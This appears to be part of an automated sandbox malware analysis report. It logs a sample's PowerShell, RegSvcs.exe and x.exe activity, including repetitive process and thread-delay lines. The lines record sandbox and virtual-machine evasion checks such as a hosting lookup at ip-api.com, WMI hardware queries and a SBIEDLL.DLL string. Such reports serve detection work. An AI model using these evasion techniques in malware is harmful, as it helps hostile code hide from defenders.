              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Local\Temp\x.exeAPI/Special instruction interceptor: Address: 2F33254
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599740Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599293Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598749Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598421Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598310Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597976Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596999Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595577Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595249Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3461Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1257Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8601Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeEvaded block: after key decisiongraph_5-86820
              Source: C:\Users\user\AppData\Local\Temp\x.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-87682
              Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 3.6 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1108Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,5_2_0040E500
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599740Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599293Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598749Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598421Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598310Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597976Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596999Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596343Jump to behavior
